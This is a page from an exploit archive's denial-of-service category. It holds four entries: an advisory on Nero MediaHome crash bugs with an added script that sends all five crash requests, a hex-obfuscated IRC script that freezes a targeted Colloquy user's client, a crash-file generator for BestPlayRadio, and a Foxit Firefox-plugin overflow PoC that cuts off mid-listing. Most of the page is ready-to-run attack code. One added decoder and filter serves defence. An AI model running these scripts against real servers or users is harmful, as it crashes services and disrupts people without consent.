Archive for Dos/Poc

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in the Nero MediaHome server, which could be exploited by a malicious person to crash the server remotely.
 
 
1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876
 
1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 (  62040072) ->  (heap)
EBX: 003e0000 (   4063232) ->   b@>@>" (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b2b000 (  62042112) -> D (heap)
ESI: 03b2a800 (  62040064) ->  (heap)
EBP: 0526f854 (  86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 (  86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 (   4063232) ->   b@>@>" (heap)
+04: 00000022 (        34) -> N/A
+08: 003e0004 (   4063236) ->   b@>@>" (heap)
+0c: 0526f88c (  86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 (  62271496) ->  (heap)
EBX: 003e0000 (   4063232) -> #  8@>+ (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b64000 (  62275584) -> B (heap)
ESI: 03b63000 (  62271488) ->  (heap)
EBP: 0527f864 (  86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 (  86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 (   4063232) -> #  8@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) -> #  8@>+ (heap)
+0c: 0527f89c (  86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 (   4063232) ->   @>+ (heap)
ECX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 (  62193921) -> N/A
EDI: 03c1bb30 (  63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 (  63028104) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 (  54262904) -> L;L (stack)
ESP: 033bfc6c (  54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 (   4063232) ->   @>+ (heap)
+04: 03c1bb78 (  63028088) ->  >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 (         0) -> N/A
+0c: 033bfd4c (  54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 (  61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)
 
 
Disasm around:
 
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com
 
 
 
1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. 
 
Crash details:
 
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 (  63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 (   4063232) ->   Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 (  63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 (  63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 (  86505512) -> `' (stack)
ESP: 0527f81c (  86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 (   4063232) ->   Tp@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) ->   Tp@>+ (heap)
+0c: 0527f860 (  86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 (  61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
 
 
Disasm around:
 
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
 
 
 
2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877
 
2.1 The vulnerability exists due to improper handling of the HTTP Host header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted request in which the Host header name is missing, i.e. a header line that starts with ":" instead of "Host:". The Nero MediaHome server's HTTP parser crashes immediately after receiving this malformed HTTP request.
 
Crash details:
 
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 (         0) -> N/A
EBX: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea (  60612074) -> localhost (heap)
EDX: 039cddea (  60612074) -> localhost (heap)
EDI: 037bc888 (  58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 (  58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 (         9) -> N/A
ESP: 0563fad0 (  90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 (  60612072) ->  localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 (         0) -> N/A
+0c: 00000001 (         1) -> N/A
+10: 000000b8 (       184) -> N/A
+14: 037c7318 (  58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
 
 
Disasm around:
 
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20
 
 
Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
 
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com
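
The advisory prints its five proofs of concept as request templates. The script below, added here as an example and not part of High-Tech Bridge's advisory, builds each of them as raw bytes exactly as printed (including the odd request lines of 1.2 and 1.3 and the name-less Host line of 2.1), sends one to a target and checks whether port 54444/TCP still accepts connections afterwards. The placeholder host name, the timeouts and the status words returned by fire() are assumptions of this example.

```python
"""Builds the five requests from sections 1.1-1.4 and 2.1 as raw bytes, sends
one to a target, and checks whether the server still accepts connections."""

import socket
import sys

NERO_PORT = 54444              # Nero MediaHome server's default port (advisory)
HOST = b"somehost.com"         # placeholder host name, as in the advisory
UA_MSIE = b"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
UA_MOZ = b"Mozilla/5.0 (Windows; U)"


def _request(request_line, header_lines):
    """Join a request line and complete header lines into one HTTP message."""
    return b"\r\n".join([request_line, *header_lines]) + b"\r\n\r\n"


def get_overlong_uri(n=500_000):
    """1.1: GET with a URI of n bytes (CVE-2012-5876)."""
    return _request(b"GET /" + b"A" * n + b" HTTP/1.1", [
        b"HOST: " + HOST, b"ACCEPT: */*", b"Accept-Encoding: None",
        b"User-Agent: " + UA_MSIE, b"Connection: Close",
        b"Accept-Transfer-Encoding: None"])


def head_overlong_uri(n=265_696):
    """1.2: HEAD variant. The space after '/' is reproduced as printed."""
    return _request(b"HEAD / " + b"A" * n + b" HTTP/1.1", [
        b"ACCEPT: */*", b"Accept-Encoding: None", b"User-Agent: " + UA_MSIE,
        b"Connection: Close", b"Accept-Transfer-Encoding: None"])


def options_overlong(n=265_712):
    """1.3: OPTIONS with no HTTP-version token, as printed in the advisory."""
    return _request(b"OPTIONS / " + b"A" * n, [
        b"Host: " + HOST, b"User-Agent: " + UA_MOZ,
        b"Accept-Language: en-us,en;q=0.5", b"Keep-Alive: 300",
        b"Referer: http://www.host.com"])


def overlong_referer(n=265_566):
    """1.4: Referer header of n bytes, no space after the colon as printed."""
    return _request(b"GET / HTTP/1.1", [
        b"Host: " + HOST, b"User-Agent: " + UA_MOZ,
        b"Accept-Language: en-us,en;q=0.5", b"Keep-Alive: 300",
        b"Connection: keep-alive", b"Referer:" + b"A" * n])


def nameless_host_header():
    """2.1 (CVE-2012-5877): the Host header with its name removed."""
    return _request(b"GET / HTTP/1.1", [
        b": " + HOST, b"User-Agent: " + UA_MOZ,
        b"Accept-Language: en-us,en;q=0.5", b"Keep-Alive: 300",
        b"Connection: keep-alive", b"Referer: http://www.host.com"])


CASES = {
    "1.1 GET overlong URI": get_overlong_uri,
    "1.2 HEAD overlong URI": head_overlong_uri,
    "1.3 OPTIONS overlong": options_overlong,
    "1.4 overlong Referer": overlong_referer,
    "2.1 nameless Host header": nameless_host_header,
}


def port_open(host, port=NERO_PORT, timeout=3.0):
    """Liveness check to run before and after each case."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def fire(host, payload, port=NERO_PORT, timeout=10.0):
    """Send one payload; report how the server ended the exchange."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            s.sendall(payload)
            return "eof" if s.recv(1024) == b"" else "replied"
        except (ConnectionResetError, BrokenPipeError):
            return "reset"
        except socket.timeout:
            return "timeout"


if __name__ == "__main__":
    target = sys.argv[1]
    for name, build in CASES.items():
        if not port_open(target):
            print("server not accepting connections; stopping")
            break
        print(name, "->", fire(target, build()), "| port open after:", port_open(target))
```

Run it as `python3 nero_dos.py <host>` against a lab copy only; a "reset" or "eof" followed by "port open after: False" is the crash the advisory describes, while "replied" means the build is not affected by that case.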
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."
 
As a temporary solution it is advised to remove the vulnerable application from your system.
 
-----------------------------------------------------------------------------------------------

Colloquy 1.3.5 / 1.3.6 Denial Of Service Vulnerability

#!/usr/bin/python3
###################################################################################
#                                                       Wednesday, January 09, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#                
#
#             -=[ Colloquy - A Mac OS X Internet Chat client. ] =-
#          
#                  [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
#  UberLame .......> Provided exploit discovery + payloads
#  Aph3x    .......> Provided main payload attack for this demonstration. <3
#  O_O      .......> Built the concept in Python3
#  Apetrick .......> Allowed testing of the exploit against his ipod
#  syk      .......> Allowed testing of the exploit against his iphone5
#
#
###################################################################################
#  SUMMARY     #
################
# 
# This DOS is designed to freeze the client making it impossible to do anything
# with it. The user will need to manually restart the application in order to
# continue using it.
#
# There are over a few dozen ways to crash the Colloquy client, however, we
# will only be showing 3 different methods. These glitches were supposed to be
# fixed in 'Colloquy' 1.3.5, however, they still exist in the latest release
# of 1.3.6...
#
################
#  VULNERABLE  #
################
#
#  Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi
#  Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi
#
################
#  CVE         #
################
#
#  There is no CVE reported.
#
################
#  PATCH       #
################
#
#  There is no PATCH available.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
import sys


shellcode = {
    # One Shot <3
    'one_shot' : [
        "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
        "23242623262340262a232a235e28242923404040245e2340242625232323",
        "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
        "2e24" ],

    # 1.3.5
    '1_3_5' : [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],

    # 1.3.6 - ( Requires Sending 25 Times )
    '1_3_6' : [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}


def own( sock, target, sc_key='one_shot' ):
    # hex-encoded IRC line: "PRIVMSG " + <target nick> + " :" + <payload> + "\r\n"
    sc = ''.join( shellcode[sc_key] )
    targ = target.encode( 'ascii' ).hex()

    msg = "505249564d534720{}203a{}0d0a".format( targ, sc )

    if sc_key != '1_3_6':
        sock.send( bytes.fromhex( msg ) )
    else:
        # the 1.3.6 payload only takes effect when repeated
        try:
            for x in range( 1, 26 ):
                sock.send( bytes.fromhex( msg ) )
                sleep( .64 )
        except OSError:
            print( 'FAILED!' )


def connect( uri, port, target, sc_key ):
    sock = socket.socket()
    try:
        sock.connect(( uri, int( port ) ))
        sock.recv( 8096 )
    except OSError:
        print( "\t[-] Failed To Connect To {}".format( uri ) )
        sys.exit( 1 )

    # register: "NICK zemp0day" / "USER zemp0day HEHE HEHE :<3"
    sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" )
    sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )

    while True:
        host_data = sock.recv( 8096 ).decode( 'utf-8', 'replace' ).strip()
        if not host_data:
            print( '\t[-] Server Closed The Connection' )
            sys.exit( 1 )

        # 396 (RPL_HOSTHIDDEN) is what the original script waited for;
        # 001 (RPL_WELCOME) is accepted too, for servers that never send 396
        if ' 396 ' in host_data or ' 001 ' in host_data:
            print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
            own( sock, target, sc_key )
            sock.send( b'QUIT\r\n' )
            sock.close()
            break

        # answer PINGs, or the server drops us before registration completes
        msg = host_data.split()
        if len( msg ) > 1 and msg[0].upper() == 'PING':
            sock.send( "PONG {}\r\n".format( msg[1] ).encode() )

    print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )


if __name__ == '__main__':
    parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )

    parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
    parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
    parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )

    parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot', choices=sorted( shellcode ),
                         help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )

    args = parser.parse_args()

    if args.nick is None:
        parser.print_help()
        sys.exit( 1 )

    connect( args.target, args.port, args.nick, args.shellcode )
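
What the script actually puts on the wire is hidden behind its hex tables. The following, an added example and not part of the #legion script, decodes those tables, rebuilds the PRIVMSG line from them, and parses incoming IRC lines so that a bouncer or ircd-side hook can drop a message carrying one of the payloads. The IRC line parser and the sample lines are this example's own; the signature match is an exact-substring check that only knows the two payloads on this page.

```python
"""Decodes the hex-obfuscated payloads from the script above, rebuilds the IRC
line it sends, and flags such a line on the wire."""

PAYLOAD_HEX = {
    # copied from the shellcode table in the script above
    "one_shot": ("687474703a2f2f782f2e2425235e26402426402426232424242425232426"
                 "23242623262340262a232a235e28242923404040245e2340242625232323"
                 "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324"
                 "2e24"),
    "1_3_5": ("687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428"
              "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874"
              "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
              "7573657228292c2873656c6563742532302d2d687474703a2f2f"),
}
# the script's "1_3_6" entry is the same bytes as "1_3_5", sent 25 times
PAYLOAD_HEX["1_3_6"] = PAYLOAD_HEX["1_3_5"]


def decode_payload(key):
    """The raw message text for one table entry."""
    return bytes.fromhex(PAYLOAD_HEX[key])


def build_privmsg(nick, key):
    """505249564d534720 <nick> 203a <payload> 0d0a in the script is just this."""
    return b"PRIVMSG " + nick.encode("ascii") + b" :" + decode_payload(key) + b"\r\n"


def parse_irc_line(line):
    """Split one raw IRC line into (prefix, COMMAND, params, trailing)."""
    line = line.rstrip(b"\r\n")
    prefix = b""
    if line.startswith(b":"):
        prefix, _, line = line[1:].partition(b" ")
    head, sep, trailing = line.partition(b" :")
    parts = head.split()
    command = parts[0].upper() if parts else b""
    return prefix, command, parts[1:], (trailing if sep else b"")


# the two distinct payloads; exact-substring signatures, nothing more general
SIGNATURES = tuple({decode_payload(k) for k in PAYLOAD_HEX})


def is_colloquy_dos(line):
    """True for a PRIVMSG whose text carries one of the known payloads."""
    _, command, _, trailing = parse_irc_line(line)
    return command == b"PRIVMSG" and any(sig in trailing for sig in SIGNATURES)


def filter_lines(lines):
    """Drop flagged lines, return the survivors (e.g. from a bouncer hook)."""
    return [ln for ln in lines if not is_colloquy_dos(ln)]
```

Decoding the tables shows the payloads are URL-shaped strings (one_shot starts "http://x/" followed by punctuation, the 1.3.x one repeats "http://x/?idx=-1+UNION+SELECT(" ...), which is consistent with the client choking on link detection rather than on anything IRC-specific; the filter above therefore keys on the message text, not on the sender.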
 

BestPlayRadio v1.0 (.mp3) Crash PoC

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Exploit Title: BestPlayRadio  v1.0 (.mp3) Crash PoC
# Version: 4.1
# Date: 2012-01-09
# Software Link: http://www.procesualitatea.ro/bestplay/BestPlayRadio.html
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
 
#!/usr/bin/python

filename = "Dz.mp3"
crash = b"\x41" * 10000                # 10000 x 'A'
try:
    print("[*] Creating exploit file...\n")
    writeFile = open(filename, "wb")   # binary mode: write the bytes as-is
    writeFile.write(crash)
    writeFile.close()
    print("[*] File successfully created!")
except IOError:
    print("[*] Error while creating file!")
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow

The description and exploit for the Foxit Reader 5.4.4.1128 Firefox plugin npFoxitReaderPlugin.dll stack buffer overflow vulnerability are given below.


<?php
/*
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll
Overlong Query String Remote Stack Buffer Overflow PoC
---------------------------
rgod

(listener)

Tested against:
  Microsoft Windows
  Mozilla Firefox 17.0.1
  Foxit Reader 5.4.3.0920
  Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll
Version: 2.2.1.530

Product url: http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage: Launch from the command line, then browse port 6666 with Firefox.
You can test it also through this url:

http://192.168.0.1/x.pdf?[A x 1024]

The file must exist, or the server must respond with the proper
Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------
L1000162F:
    push ebx
    push esi
    push edi
    mov edi,ebp
    or ecx,FFFFFFFFh
    xor eax,eax
    xor ebx,ebx
    xor esi,esi
    repne scasb
    not ecx
    dec ecx
    test ecx,ecx
    jle L100016E4
L1000164A:
    mov al,[esi+ebp]
    mov word ptr [esp+18h],0000h
    cmp al,25h
    jz  L10001661
    mov ecx,[esp+1Ch]
    mov [ebx+ecx],al
    jmp L100016CE
L10001661:
    mov al,[esi+ebp+01h]
    cmp al,30h
    jl  L1000166D
    cmp al,39h
    jle L1000167D
L1000166D:
    cmp al,41h
    jl  L10001675
    cmp al,46h
    jle L1000167D
